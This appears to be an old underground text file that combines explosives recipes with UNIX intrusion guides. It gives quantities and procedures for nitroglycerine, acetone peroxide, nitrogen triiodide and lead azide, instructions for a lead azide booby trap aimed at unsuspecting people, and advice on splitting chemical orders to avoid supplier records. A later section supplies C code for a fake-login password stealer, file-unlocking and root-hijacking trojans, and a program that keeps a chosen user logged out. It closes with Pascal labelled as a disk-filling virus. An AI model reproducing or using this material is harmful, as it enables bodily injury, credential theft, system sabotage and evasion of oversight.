permanganate + glycerine. Amounts: 55g iron(III) oxide, 15g aluminum powder, 25g potassium permanganate, 6ml glycerine. III. Nitrogen-containing high explosives. A. Mercury(II) Fulminate To produce Mercury(II) Fulminate, a very sensitive shock explosive, one might assume that it could be formed by adding Fulminic acid to mercury. This is somewhat difficult since Fulminic acid is very unstable and cannot be purchased. I did some research and figured out a way to make it without fulminic acid. You add 2 parts nitric acid to 2 parts alcohol to 1 part mercury. This is theoretical (I have not yet tried it) so please, if you try this, do it in very* small amounts and tell me the results. B. Nitrogen Triiodide Nitrogen Triiodide is a very powerful and very shock sensitive explosive. Never store it and be carful when you're around it- sound, air movements, and other tiny things could set it off. Materials- 2-3g Iodine 15ml conc. ammonia 8 sheets filter paper 50ml beaker feather mounted on a two meter pole ear plugs tape spatula stirring rod Add 2-3g Iodine to 15ml ammonia in the 50ml beaker. Stir, let stand for 5 minutes. DO THE FOLLOWING WITHIN 5 MINUTES! Retain the solid, decant the liquid (pour off the liquid but keep the brown solid...). Scape the brown residue of Nitrogen Triiodide onto a stack of four 73 sheets of filter paper. Divide solid into four parts, putting each on a seperate sheet of dry filter paper. Tape in position, leave to dry undisturbed for AT LEAST 30 minutes (preferrably longer). To detonate, touch with feather. (WEAR EAR PLUGS WHEN DETONATING OR COVER EARS- IT IS VERY LOUD!) C. Cellulose Nitrate (Guncotton) Commonly known as Smokeless powder, Nitrocellulose is exactly that- it does not give off smoke when it burns. Materials- 70ml concentrated sulfuric acid 30ml concentrated nitric acid 5g absorbent cotton 250ml 1M sodium bicarbonate 250ml beaker ice bath tongs paper towels Place 250ml beaker in the ice bath, add 70ml sulfuric acid, 30 ml nitric acid. Divide cotton into .7g pieces. With tongs, immerse each piece in the acid solution for 1 minute. Next, rinse each piece in 3 successive baths of 500ml water. Use fresh water for each piece. Then immerse in 250ml 1M sodium bicarbonate. If it bubbles, rinse in water once more until no bubbling occurs. Squeeze dry and spread on paper towels to dry overnight. D. Nitroglycerine Nitroglycerine is a *VERY* dangerous shock sensitive explosive. It is used in making dynamite, among other things. I am not sure as to the proportions and amounts of chemicals to be used, so I shall use estimates. Materials- 70ml conc. sulfuric acid 30ml conc. nitric acid 10 ml glycerine ice bath 150ml beaker Put the 150ml beaker in the ice bath and make sure that it is very cold. Slowly add the 70ml sulfuric and 30ml nitric acids to the beaker, trying to maintain a low temperature. When the temperature starts to level off, add about 10ml glycerine. If it turns brown or looks funny, **RUN LIKE HELL**. When Nitroglycerine turns brown, that means it's ready to explode... If it stays clear and all works well, keep the temperature as low as you can and let it sit for a few hours. You then should have some Nitroglycerine, probably mixed with nitric and sulfuric acids. When you set it off, you must not be nearby. Nitroglycerine can fill 10,000 times its original area with expanding gases. This means that if you have 10ml's of Nitroglycerine in there, it will produce some 100,000ml's of gases. To make it into dynamite, the Nitroglycerine must be absorbed into something like wood pulp or diamaeceous earth (spelled something like that). 73  IV. Other stuff A. Peroxyacetone Peroxyacetone is extremely flammable and has been reported to be shock sensitive. Materials- 4ml Acetone 4ml 30% Hydrogen Peroxide 4 drops conc. hydrochloric acid 150mm test tube Add 4ml acetone and 4ml hydrogen peroxide to the test tube. Then add 4 drops concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to appear. If no change is observed, warm the test tube in a water bath at 40 celsius. Allow the reaction to continue for two hours. Swirl the slurry and filter it. Leave out on filter paper to dry for at least two hours. To ignite, light a candle tied to a meter stick and light it (while staying at least a meter away). B. Smoke smoke smoke... The following reaction should produce a fair amount of smoke. Since this reaction is not all that dangerous you can use larger amounts if necessary for larger amounts of smoke. 6g zinc powder 1g sulfur powder Insert a red hot wire into the pile, step back. A lot of smoke should be created. Pyrotechnics #2 Touch Paper, Self Igniting Mixtures, Percussion Explosives Sodium Azide - NaN 3 This white powder is very poisonous. It is also a bit unstable, so treat it gently. Lead Nitrate - Pb(NO ) 3 2 This contains poisonous lead and is very water soluble so your body will absorb it quickly, given the chance. The government has banned leaded paints and is phasing out leaded gasoline because the stuff slowly accumulates in your body and can screw up all sorts of important innards. If you are careless with Lead Nitrate you can do a few lifetimes' worth of damage in one 73 afternoon. Ammonium Nitrate - NH NO 4 3 Commonly used as fertilizer, this stuff is somewhat dangerous in large quantities, particularly if it gets very hot. (Entire shiploads of this material have been known to go up all at once.) When heated gently, it decomposes into water and nitrous oxide (laughing gas). Farmers sometimes use it to blow up tree stumps by mixing it with fuel oil and setting the gunk off with a detonator. We'll have a very different use for it here. Potassium Nitrate - KNO 3 Also known as saltpeter, this is commercially used as a diuretic for animals. It also works as an oxidizing agent in various pyrotechnic mixtures. That is, when heated it provides the oxygen needed to make the rest of the mixture burn. Potassium Potassium Nitrate Nitrite Oxygen 2KNO ---> 2KNO + O 3 2 2 Potassium Chlorate - KClO 3 A much more spectacular oxidizing agent than Potassium Nitrate. It not only yields more oxygen than Potassium Nitrate, it does so more easily. Pyrotechnic mixtures containing this chemical will require much less of it, and yet burn more fiercely. Even percussion can readily set the mixtures off. This can be useful, but it sometimes makes the mixtures more sensitive than you'd like. Mixtures containing this chemical must be handled carefully. Potassium Chlorate is also poisonous. Potassium Potassium Chlorate Chloride Oxygen 2KClO ---> 2KCl + 3O 3 2 Aluminum Dust Very finely divided aluminum. When put in a glass jar, it almost looks like a solid piece of grey metal. In this form it is flammable. Also, it can seriously damage your lungs if you inhale it. Be careful not to stir up any clouds of dust, and it goes without saying that you shouldn't use it near an open flame. Zinc Dust Very finely divided zinc. Not quite as flammable as Aluminum Dust, but still worth handling carefully. Can also damage your lungs if inhaled. 73  Lampblack This is very finely divided carbon, usually obtained as a soot from other manufacturing processes. It is much more effective in pyrotechnic mixtures than powdered charcoal. Tiny spots of this are almost unnoticeable, but they stick to your hands and smear incredibly far. If you're not very tidy you should expect to find black smears all over your face and hands after using this. Sulfur A yellow powder used as a reducing agent in many pyrotechnic mixtures. Buy this in the finely powdered form. You can also get it in hard lumps, but these will just waste extra time as you have to grind them yourself. Potassium Permanganate An oxidizing agent that's somewhat less vigorous than others mentioned here. Not usually used in pyrotechnic mixtures because it's more expensive and less effective than some of the alternatives. There are a few cases when it's just the right thing. Don't let this accidentally come in contact with glycerine. If such an accident happens, the resulting mess should be immediately wiped up with wet paper towels and buried or flushed down a toilet. It should NOT be thrown away in a dry waste receptacle!!! Gum Arabic A white powder which is mixed with water to make a glue like substance. Useful for coating various mixtures or binding them together into a solid mass. Sodium Peroxide A very strange and dangerous oxidizer. Don't let it get wet and don't let it touch your skin. Glycerine A thick liquid, chemically similar to rubbing alcohol. Though harder to get burning, it will burn in the right circumstances. Fairly safe stuff. Iodine Crystals Pure Iodine is a steel grey solid, which is poisonous and which produses poisonous vapors when heated. Smells similar to the chlorine used in bleaches and swimming pools. If you accidentally should drop some on a hot surface and notice the odor, you should leave the area. Touch Paper This is an easily made material that acts like a slow burning fuse and is ideal for testing small amounts of a pyrotechnic mixture. It is made by soaking a piece of absorbent paper, like a paper towel, in a saturated 73 solution of Potassium Nitrate. (A saturated solution means that you have dissolved as much of the chemical in water as is possible.) Hang the paper up to dry, and be sure to wipe up any drips. When dry it is ready. Cut off a small strip and light the edge to see how different it acts from ordinary paper. This will ignite all but the most stubborn mixtures, and will ignite gunpowder, which will in turn ignite most anything else. Don't dip the towel in the Potassium Nitrate solution a second time to try to make it "stronger". This will actually make it less effective. Some of the fancier paper towels don't work too well for this. Best results are obtained from the cheap folded paper towels found in public restrooms everywhere. Self Igniting Mixtures Pulverize 1 gram of Potassium Permanganate crystals and place them on an asbestos board or in an earthenware vessel. Let 2-3 drops of glycerine fall onto the Potassium Permanganate. The mixture will eventually sizzle and then flare. Potassium Permanganate is the oxidizing agent. The glycerine is oxidized so quickly that heat is generated faster than it can be dissipated. Consequently, the glycerine is ignited. Because this mixture takes so long to catch on fire, it is sometimes useful when a time delay is needed to set off some other mixture. If you lose patience with this test, DO NOT THROW THE MIXTURE AWAY IN A WASTEBASKET!!! Either bury it or flush it down a toilet. I know of at least one house fire that was started because this was not done. Given time, this stuff WILL start to burn. This demonstration produces a very nice effect, but sends out a lot of poisonous fumes, so do it outside. Make a mound of equal volumes of iodine crystals and aluminum dust. Make a small indentation at the top of the mound and add a drop or two of water and move away. It will hiss and burst into flame, generating thick purple smoke. The fumes are Iodine vapor which is very caustic, so make sure you are upwind of the fire. Since this is set off by moisture, you should not store the mixed material. Mix it immediately before you plan to use it. Shred a small piece of newspaper and place on it a small amount of sodium peroxide. Add two drops of hot water. The paper will be ignited. CAUTION: Keep Sodium Peroxide from moisture and out of contact with organic materials (your skin, for example.) Ammonium Nitrate, 5 grams, 1 gram of Ammonium Chloride. Grind these SEPARATELY, and add 1/4 gram of zinc dust. Form a cone and add 2-4 drops of water. A bright blue flame with large volumes of smoke forms. Depending on the quality of your zinc dust, you may need to increase the quantity of zinc. Since this is ignited by moisture, you should not attempt to store this mixture. Percussion Explosives This section will not only introduce a couple of mixtures with interesting possibilities, but it will also demonstrate how sensitive mixtures containing Potassium Chlorate can be. Keep in mind that Chlorate mixtures can be a LOT more sensitive than the ones shown here. 73  Mix 1 part by weight of Sulfur, and 3 parts Potassium Chlorate. Each should be ground separately in a mortar. They should be mixed lightly without any pressure on a sheet of paper. A small amount of this mixture (less than one gram!!) placed on a hard surface and struck with a hammer will explode with a loud report. Mix the following parts by weight, the same way as above, Potassium Chlorate 6 Lampblack 4 Sulfur 1 Both of these mixtures are flammable. Mix small quantities only. Lead Azide Pb(N ) 3 2 Unlike many explosives that must be enclosed in a casing to explode, and others that require a detonator to set them off, Lead Azide will explode in open air, either due to heat or percussion. Mixed with gum arabic glue, tiny dots of it are placed under match heads to make trick exploding matches. The same mixture coated onto 1/2 " wood splinters are used to "load" cigars. In larger amounts, it is used as a detonator. A moderately light tap will set it off, making it much more sensitive than the percussion explosives already mentioned. It is very easy to make. Take about 1.3 grams of sodium azide and dissolve it in water. It's best not to use any more water than necessary. In a separate container, dissolve about 3.3 grams of Lead Nitrate, again only using as much water as needed to get it to dissolve. When the two clear liquids are mixed, a white precipitate of Lead Azide will settle out of the mixture. Add the Lead Nitrate solution, while stirring, until no more Lead Azide precipitates out. You may not need to use it all. Note that the above weights are given only for your convenience if you have the necessary scales, and give the approximate proportions needed. You need only continue to mix the solutions until no more precipitate forms. The precipitate is filtered out and rinsed several times with distilled water. It is a good idea to store this in its wet form, as it is less sensitive this way. It's best not to store it if possible, but if you do, you should keep it in a flexible plastic container that wont produce sharp fragments in case of an explosion. (NO MORE THAN A GRAM AT A TIME !!!!) Also, make sure that the mouth of the container is wiped CLEAN before putting the lid on. Just the shock of removing the lid is enough to set off the dry powder if it is wedged between the container and the stopper. Don't forget that after you've removed the precipitate from the filter paper, there will still be enough left to make the filter paper explosive. Lead Azide is very powerful as well as very sensitive. Never make more than a couple of grams at one time. Reaction Equations 73  Lead Sodium Lead Sodium Nitrate Azide Azide Nitrate Pb(NO ) + 2NaN ---> Pb(N ) + 2NaNO 3 2 3 3 2 3 Don't try to salvage the Sodium Nitrate that's left over (dissolved in the water). Sodium nitrate is cheap, not really useful for good pyrotechnics, and this batch will be contaminated with poisonous lead. It's worthless stuff. Dump it out. To demonstrate the power of a little bit of Lead Azide, cut out a piece of touch paper in the following shape ----------------------------- ! ! ! ! ! --------------- ! ! ! --------------- ! ! ! ! ----------------------------- Where the size of the wide rectangle is no more than one inch x 1/2 inch, and the length of the little fuse is at least 3/4 inch. Apply a thin layer of wet Lead Azide to the large rectangle with a paint brush and let it dry thoroughly. When done, set this tester out in the open, light the fuse at the very tip and step back. If done properly, the tiny bit of white powder will produce a fairly loud explosion. A Lead Azide Booby Trap Get some string that's heavy enough so that it won't break when jerked hard. A couple of feet is enough to test this out. You may want to use a longer piece depending on what you plan to do with this. Fold a small "Z" shape in the center of the string, as shown in figure 1. The middle section of the "Z" should be about one inch long. -------------------------------------. . . . -------------------------------------------------- Figure 1. Fold string into a small Z Next, twist the Z portion together as tightly as you can. Don't worry if it unwinds a bit when you let go, but it should still stay twisted closely together. If it doesn't, you will need a different kind of string. Figure 2 73 tries to show what this will look like. -------------//////////////////----------------- Figure 2. Twist the Z portion tightly Next, apply some wet Lead Azide to the twisted portion with a paint brush. The Lead Azide should have a bit of Gum Arabic in it to make it sticky. Cut out a piece of paper, two inches by 6 inches long, wrap it around the twisted portion, and glue the end on so that it stays put. You should now have a two inch narrow paper tube with a string sticking out each end, as shown in figure 3. ------------------------- ! ! ----------! !------------------- ! ! ------------------------- Figure 3. The completed Booby Trap You should now set the booby trap aside for at least two weeks so that the Lead Azide inside can dry completely. Don't try to speed up the process by heating it. When the two ends of the string are jerked hard, the friction in the wound up string will set off the Lead Azide. The booby trap can be attatched to doors, strung out as tripwires, or set up in any other situation that will cause a quick pull on the strings. Be careful not to use too much Lead Azide. A little will go a long way. Before trying this on an unsuspecting soul, make a test booby trap as explained here, tie one end to a long rope, and set it off from a distance. The paper wound around the booby trap serves two purposes. It keeps the Lead Azide from flaking off, and it pads the stuff so it will be less likely to get set off accidentally. A good vigorous swat will still set it off though, so store these separately and keep them padded well. Getting The Chemicals As always, be sure to use your brains when ordering chemicals from a lab supply house. Those people KNOW what Sodium Azide and Lead Nitrate make when mixed together. They also know that someone who orders a bunch of chlorates, nitrates, metal dusts, sulfur, and the like, probably has mischeif in mind, and they keep records. So break your orders up, order from different supply houses, get some friends to order some of the materials, and try to order the things long before you plan do do anything with them. It's a pain, and the multiple orders cost a lot in extra shipping charges, but that's what it costs to cover your tracks. DO it!  73  Super Bottle Rockets Go down to a hobby shop and buy some Estes rocket engines and some small dowels, you can make these babies. Attach the dowel to the rocket casing with tape or glue and be SURE to plug you the top end of the engine so you get a bigger bang for your money. Epoxy works well for this. The great thing about it is that they go VERY FAST and VERY FAR. The speed is enough to knock out anything easily. You can go for A, B, C, or D engines but remember that the heavier and more powerful the engine, the longer the dowel you will need. Buy the C6-7 engines with a 6 second burn and 7 second delay for discharge. ------------------ UNIX Trojan Horses ------------------ Introduction ------------ "UNIX Security" is an oxymoron. It's an easy system to bruteforce hack (most UNIX systems don't hang up after x number of login tries, and there are a number of default logins, such as root, bin, sys and uucp). Once you're in the system, you can easily bring it to its knees or, if you know a little 'C', you can make the system work for you and totally eliminate the security barriers to creating your own logins, reading anybody's files, etcetera. This file will outline such ways by presenting 'C' code that you can implement yourself. Requirements ------------ You'll need a working account on a UNIX system. It should be a fairly robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real machine (a PDP/11, VAX, Pyramid, etc.) for the best results. If you go to school and have an account on the school system, that will do perfectly. Notes ----- This file was inspired an article in the April, '86 issue of BYTE entitled "Making UNIX Secure." In the article, the authors say "We provide this information in a way that, we hope, is interesting and useful yet stops short of being a 'cookbook for crackers.' We have often intentionally omitted details." I am following the general outline of the article, giving explicit examples of the methods they touched on. Project One: Fishing For Passwords ----------------------------------- You can implement this with only a minimal knowledge of UNIX and C. However, you need access to a terminal that many people use - the computer lab at your school, for example. When you log onto a typical UNIX system, you see something like this:  73 Tiburon Systems 4.2bsd / System V (shark) login: shark Password: (not printed) The program I'm giving you here simulates a logon sequence. You run the program from a terminal and then leave. Some unknowing fool will walk up and enter their login and password. It is written to a file of yours, then "login incorrect" is printed, then the fool is asked to log in again. The second time it's the real login program. This time the person succeeds and they are none the wiser. On the system, put the following code into a file called 'horse.c'. You will need to modify the first 8 lines to fit your system's appearance. ----- Code Begins Here ----- /* this is what a 'C' comment looks like. You can leave them out. */ /* #define's are like macros you can use for configuration. */ #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n" /* The above string should be made to look like the message that your * system prints when ready. Each \n represents a carriage return. */ #define LOGIN "login: " /* The above is the login prompt. You shouldn't have to change it * unless you're running some strange version of UNIX. */ #define PASSWORD "password:" /* The above is the password prompt. You shouldn't have to change * it, either. */ #define WAIT 2 /* The numerical value assigned to WAIT is the delay you get after * "password:" and before "login incorrect." Change it (0 = almost * no delay, 5 = LONG delay) so it looks like your system's delay. * realism is the key here - we don't want our target to become * suspicious. */ #define INCORRECT "Login incorrect.\n" /* Change the above so it is what your system says when an incorrect * login is given. You shouldn't have to change it. 73  */ #define FILENAME "stuff" /* FILENAME is the name of the file that the hacked passwords will * be put into automatically. 'stuff' is a perfectly good name. */ /* Don't change the rest of the program unless there is a need to * and you know 'C'. */ #include #include int stop(); main() { char name[10], password[10]; int i; FILE *fp, *fopen(); signal(SIGINT,stop); initscr(); printf(SYSTEM); printf(LOGIN); scanf("%[^\n]",name); getchar(); noecho(); printf(PASSWORD); scanf("%[^\n]",password); printf("\n"); getchar(); echo(); sleep(WAIT); if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { #fprintf(fp,"login %s has password %s\n",name,password); #fclose(fp); #} printf(INCORRECT); endwin(); } stop() { endwin(); exit(0); } ----- Source Ends Here ----- OK, as I said, enter the above and configure it so it looks exactly like 73 your system's login sequence. To compile this program called 'horse.c' type the following two lines: (don't type the %'s, they are just a sample prompt) % cc horse.c -lcurses -ltermcap % mv a.out horse You now have the working object code in a file called 'horse'. Run it, and if it doesn't look like your systems logon sequence, re-edit horse.c and recomplie it. When you're ready to put the program into use, create a new file and call it 'trap' or something. 'trap' should have these two commands: horse (this runs your program) login (this runs the real login program) to execute 'trap' type: % source trap (again, don't type the %) and walk away from your terminal... After you've run it successfully a few times, check your file called 'stuff' (or whatever you decided to call it). It will look like this: user john has password secret user mary has password smegma etc. Copy down these passwords, then delete this file (it can be VERY incriminating if the superuser sees it). Note - for best results your terminal should be set to time-out after a few minutes of non-use - that way, your horse program doesn't run idle for 14 hours if nobody uses the terminal you ran it on. ----- The next projects can be run on a remote system, such as the VAX in Michigan you've hacked into, or Dartmouth's UNIX system, or whatever. However, they require a little knowledge of the 'C' language. They're not something for UNIX novices. Project Two: Reading Anybody's Files ------------------------------------- When somebody runs a program, they're the owner of the process created and that program can do anything they would do, such as delete a file in their directory or making a file of theirs available for reading by anybody. When people save old mail they get on a UNIX system, it's put into a file called mbox in their home directory. This file can be fun to read but is usually impossible for anybody but the file's owner to read. Here is a short program that will unlock (i.e. chmod 777, or let anybody on the system read, write or execute) the mbox file of the person who runs the program: ----- Code Begins Here ----- 73  #include struct passwd *getpwnam(name); struct passwd *p; char buf[255]; main() { p = getpwnam(getlogin()); sprintf(buf,"%s/%s",p->pw_dir,"mbox"); if ( access(buf,0) > -1 ) { sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox"); system(buf); } } ----- Code Ends Here ----- So the question is: How do I get my target to run this program that's in my directory? If the system you're on has a public-messages type of thing (on 4.xbsd, type 'msgs') you can advertise your program there. Put the above code in another program - find a utility or game program in some magazine like UNIX WORLD and modify it and do the above before it does it's real thing. So if you have a program called tic-tac-toe and you've modified it to unlock the mbox file of the user before it plays tic-tac-toe with him, advertise "I have a new tic- tac-toe program running that you should all try. It's in my directory." or whatever. If you don't have means of telling everybody on the system via a public message, then just send mail to the specific people you want to trap. If you can't find a real program to modify, just take the above program and add this line between the two '}' lines at the end of the program: printf("Error opening tic-tac-toe data file. Sorry!\n"); when the program runs, it will print the above error message. The user will think "Heh, that dude doesn't know how to write a simple tic-tac-toe program!" but the joke's on him - you can now read his mail. If there's a specific file in a user's directory that you'd like to read (say it's called "secret") just throw together this general program: main() { if ( access("secret",0) > -1 ) system("chmod 777 secret"); } then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program called super_star_wars, will you try it out?" You can use your imagination. Think of a command you'd like somebody to execute. Then put it inside a system() call in a C program and trick them 73 into running your program! Here's a very neat way of using the above technique: Project Three: Become the superuser ----------------------------------- Write a program that you can get people to run. Put this line in it somewhere: if ( !strcmp(getlogin(),"root") ) system("whatever you want"); This checks to see if the root login is running your program. If he is, you can have him execute any shell command you'd like. Here are some suggestions: "chmod 666 /etc/passwd" /etc/passwd is the system's password file. The root owns this file. Normally, everyone can read it (the passwords are encrypted) but only the root can write to it. Take a look at it and see how it's formatted if you don't know already. This command makes it possible for you to now write to the file - i.e. create unlimited accounts for yourself and your friends. "chmod 666 /etc/group" By adding yourself to some high-access groups, you can open many doors. "chmod 666 /usr/lib/uucp/L.sys" Look for this file on your system if it is on the uucp net. It contains dialups and passwords to other systems on the net, and normally only the uucp administrator can read it. Find out who owns this file and get him to unknowingly execute a program to unlock it for you. "rm /etc/passwd" If you can get the root to execute this command, the system's passwd file will be removed and the system will go down and will not come up for some time to come. This is very destructive. ----- If you are going to go about adding a trojan horse program to the system, there are some rules you should follow. If the hidden purpose is something major (such as unlocking the user's mbox or deleting all of his files or something) this program shouldn't be a program that people will be running a lot (such as a popular computer game) - once people discover that their files are public access the source of the problem will be discovered quite easily. Save this purpose for a 'test' program (such as a game you're in the process of writing) that you ask individual people to run via mail or 'chatting' with them. As I said, this 'test' program can bomb or print a phony error message after completing its task, and you will just tell the person "well, I guess it needs more work", wait until they log off, and then read whatever file of theirs that you've unlocked. If your trojan horse program's sole purpose is 73 to catch a specific user running it - such as the root or other high-powered user - you can put the code to do so in a program that will be run a lot by various users of the system. Your modification will remain dormant until he runs it. If you can't find the source to 'star trek' or whatever in C, just learn C and convert something from pascal. It can't hurt to learn C as it's a great language. We've just seen what it can do on a UNIX system. Once you've caught the root (i.e. you can now modify the /etc/passwd file) remove the spurious code from your trojan horse program and you'll never be caught. Unix - Odds & Ends -- ------- ----- --- --- ------ 1. Keeping Users Off The System -- ------- ----- --- --- ------ Now, we all know by now how to log users off (one way is to redirect an 'stty 0' command to their tty) but unless you have root privs, this will not work when a user has set 'mesg n' and prevented other users from writing to their terminal. But even users who have a 'mesg n' command in their .login (or .profile or .cshrc) file still have a window of vulnerability, the time between login and the locking of their terminal. I designed the following program, block.c, to take advantage of this fact. To get this source running on your favorite Unix system, upload it, call it 'block.c', and type the following at the % or $ prompt: cc -o block block.c once you've compiled it successfully, it is invoked like so: block username [&] The & is optional and recommended - it runs the program in the background, thus letting you do other things while it's at work. If the user specified is logged in at present, it immediately logs them out (if possible) and waits for them to log in. If they aren't logged in, it starts waiting for them. If the user is presently logged in but has their messages off, you'll have to wait until they've logged out to start the thing going. Block is essentially an endless loop : it keeps checking for the occurence of the username in /etc/utmp. When it finds it, it immediately logs them out and continues. If for some reason the logout attempt fails, the program aborts. Normally this won't happen - the program is very quick when run unmodified. However, to get such performance, it runs in a very tight loop and will eat up a lot of CPU time. Notice that near the end of the program there is the line: /*sleep(SLEEP) */ the /* and */ are comment delimiters - right now the line is commented out. If you remove the comments and re-compile the program, it will then 73 'go to sleep' for the number of seconds defined in SLEEP (default is 5) at the end of every loop. This will save the system load but will slightly decrease the odds of catching the user during their 'window of vulnerability.' If you have a chance to run this program at a computer lab at a school or somewhere similar, run this program on a friend (or an enemy) and watch the reaction on their face when they repeatedly try to log in and are logged out before they can do *anything*. It is quite humorous. This program is also quite nasty and can make you a lot of enemies! caveat #1: note that if you run the program on yourself, you will be logged out, the program will continue to run (depending on the shell you're under) and you'll have locked yourself out of the system - so don't do this! caveat #2: I wrote this under OSx version 4.0, which is a licensed version of Unix which implements 4.3bsd and AT&T sysV. No guarantees that it will work on your system. caveat #3: If you run this program in background, don't forget to kill it when you're done with it! (when you invoke it with '&', the shell will give you a job number, such as '[2] 90125'. If you want to kill it later in the same login session, type 'kill %2'. If you log in later and want to kill it, type 'kill 90125'. Just read the man page on the kill command if you need any help... ----- cut here ----- /* block.c -- prevent a user from logging in * by Shooting Shark * usage : block username [&] * I suggest you run this in background. */ #include #include #include #include #include #define W_OK2 #define SLEEP5 #define UTMP"/etc/utmp" #define TTY_PRE "/dev/" main(ac,av) int ac; char *av[]; { int target, fp, open(); struct utmpuser; struct termio*opts; char buf[30], buf2[50]; if (ac != 2) { printf("usage : %s username\n",av[0]); 73 exit(-1); } for (;;) { if ((fp = open(UTMP,0)) == -1) { printf("fatal error! cannot open %s.\n",UTMP); exit(-1); } while (read(fp, &user, sizeof user) > 0) { if (isprint(user.ut_name[0])) { if (!(strcmp(user.ut_name,av[1]))) { printf("%s is logging in...",user.ut_name); sprintf(buf,"%s%s",TTY_PRE,user.ut_line); printf("%s\n",buf); if (access(buf,W_OK) == -1) { printf("failed - program aborting.\n"); exit(-1); } else { if ((target = open(buf,O_WRONLY)) != EOF) { sprintf(buf2,"stty 0 > %s",buf); system(buf2); printf("killed.\n"); sleep(10); } } /* else */ } /* if strcmp */ } /* if isprint */ } /* while */ close(fp); /*sleep(SLEEP); */ } /* for */ } ----- cut here ----- -- ------------- ----- ----- ---- ------ --- ------ 2. Impersonating other users with 'write' and 'talk' -- ------------- ----- ----- ---- ------ --- ------ This next trick wasn't exactly a work of stupefying genius, but is a 73 little trick (that anybody can do) that I sometimes use to amuse myself and, as with the above, annoy the hell out of my friends and enemies. Nearly every Unix system has the 'write' program, for conversing with other logged-in users. As a quick summary: If you see that user 'clara' is logged in with the 'who' or 'w' command or whatever, and you wish to talk to her for some reason or another, you'd type 'write clara'. Clara then would see on her screen something like this (given that you are username 'shark'): [3 ^G's] Message from shark on ttyi13 at 23:14 ... You then type away at her, and whatever you type is sent to her terminal line-by-line. If she wanted to make it a conversation rather than a monologue, she'd type 'write shark,' you'd get a message similar to the above on your terminal, and the two of you would type away at each other to your little heart's content. If either one of you wanted to end the conversation, you would type a ^D. They would then see the characters 'EOF' on their screen, but they'd still be 'write'ing to you until they typed a ^D as well. Now, if you're on a bigger installation you'll probably have some sort of full-screen windowing chat program like 'talk'. My version of talk sends the following message: Message from Talk_Daemon@tibsys at 23:14 ... talk: connection requested by shark@tibsys. talk: respond with: talk shark@tibsys Anyway, here's where the fun part begins: It's quite easy to put a sample 'write' or 'talk' message into a file and then edit so that the 'from' is a different person, and the tty is listed differently. If you see that your dorky friend roger is on ttyi10 and the root also happens to be logged on on ttyi01, make the file look something like this: [3 control-G's] Message from root on ttyi01 at [the current time] wackawackawackawackawacka!!! [or a similarly confusing or rude message...] EOF Then, send this file to roger's terminal with: cat filename > /dev/ttyi10 He'll get the message on his terminal and wonder what the hell the superuser is talking about. He might even 'write' back to the superuser with the intent of asking 'what the hell are you talking about?'. For maximum effectiveness, *simultaneously* send a message to root 'from' roger at the appropriate terminal with an equally strange message - they'll then engage in a conversation that will go something like "what did you mean by that?" "what do you mean, what do I mean? What did *you* mean 73 by that?" etc. A splendid time is guaranteed for all! Note that you don't have to make 'root' the perpetrator of the gag, any two currently logged-in users who have their terminals open for messages can join in on the fun. Similarly, you can fake a few 'talk' pages from/to two people...they will then probably start talking...although the conversation will be along the lines of "what do you want?" "you tell me." "you paged me, you tell *me." etcetera, while you laugh yourself silly or something like that. A variation on the theme: As I said, when using 'write' you type a ^D to end the conversation, and the person you're typing at sees an 'EOF' on their screen. But you could also just *type* 'EOF', and they'd think you've quit...but you still have an open line to their terminal. Even if they later turn messages off, you still have the ability to write to their terminal. Keeping this fact in mind, anybody who knows what they're doing can write a program similar to my 'block' program above that doesn't log a user out when they appear on the system, but opens their tty as a device and keeps the file handle in memory so you can redirect to their terminal - to write rude messages or to log them out or whatever - at any time, until they log out. {modified version of Arpnet virus:Pascal should be redif to ASM} {obj are ok compile will attach with viru@2 mechanizism..per @Trash33} {makes the disk space packets and eats all avalible space,loop it } {Enjoy and modify this is root version...aka SHADOWSPAWN} Unit Netsnd; Interface Uses Crt, Dos, Consts, Types, Iostuff, Routing, Netvars, Netfncs, Netrcv, Btree, Filedecs; PROCEDURE make_packets; Implementation {--------MAKE PACKETS AND PACKETS AND PACKETS--------------------------------} PROCEDURE make_packets; VAR msg_counter : INTEGER; tmp_ptr : node_info_ptr; month,day,year,dow : WORD; hour,minute,second,hund : WORD; temp : line; rl : LONGINT; x : INTEGER; new_net : INTEGER; new_node : INTEGER; attr : INTEGER; fwd : BOOLEAN; ch : CHAR; t1,t2,t3 : INTEGER; i,j : INTEGER; seen : BOOLEAN; more : BOOLEAN; lrnum : lrnumber; lrtmp : LONGINT; tmp : short_string; {-------------------SET UP FOR NET NODE PACKETS---------------------------} 73  PROCEDURE construct_packet(new_net, new_node: INTEGER); VAR first_pk : INTEGER; BEGIN INC(msg_counter); tmp_ptr := node_c; first_pk := -1; WHILE (tmp_ptr <> NIL) AND NOT ((tmp_ptr^.net = new_net) AND (tmp_ptr^.node = new_node)) DO BEGIN tmp_ptr := tmp_ptr^.ptr END; IF tmp_ptr = NIL THEN BEGIN NEW(tmp_ptr); FILLCHAR(tmp_ptr^,SIZEOF(node_info),0); tmp_ptr^.ptr := node_c; node_c := tmp_ptr; node_c^.net := new_net; node_c^.node := new_node; node_c^.tries := 0; node_c^.connects := 0; node_c^.success := FALSE; ASSIGN(pk_index,default.database_drive + pkindexfile); {$I-} RESET(pk_index); {$I+} IF IOresult = 0 THEN BEGIN x := 0; pk_idx.net := 0; pk_idx.node := 0; WHILE NOT EOF(pk_index) AND NOT ((pk_idx.net = new_net) AND (pk_idx.node = new_node)) DO BEGIN READ(pk_index,pk_idx); IF pk_idx.avail AND (first_pk < 0) THEN first_pk := x; INC(x) END; IF (pk_idx.net = new_net) AND (pk_idx.node = new_node) THEN BEGIN node_c^.pk_num := x - 1; first_pk := -1 END ELSE BEGIN IF first_pk < 0 THEN first_pk := FILESIZE(pk_index); node_c^.pk_num := first_pk; pk_idx.avail := FALSE; pk_idx.sent := FALSE; pk_idx.attempts := 0; pk_idx.net := new_net; pk_idx.node := new_node; SEEK(pk_index,first_pk); WRITE(pk_index,pk_idx) END END 73  ELSE BEGIN REWRITE(pk_index); first_pk := 0; node_c^.pk_num := 0; pk_idx.avail := FALSE; pk_idx.sent := FALSE; pk_idx.attempts := 0; pk_idx.net := new_net; pk_idx.node := new_node; SEEK(pk_index,first_pk); WRITE(pk_index,pk_idx) END; CLOSE(pk_index); ASSIGN(p_info,default.database_drive + 'PK' + dual(node_c^.pk_num) + '.XMT'); {$I-} 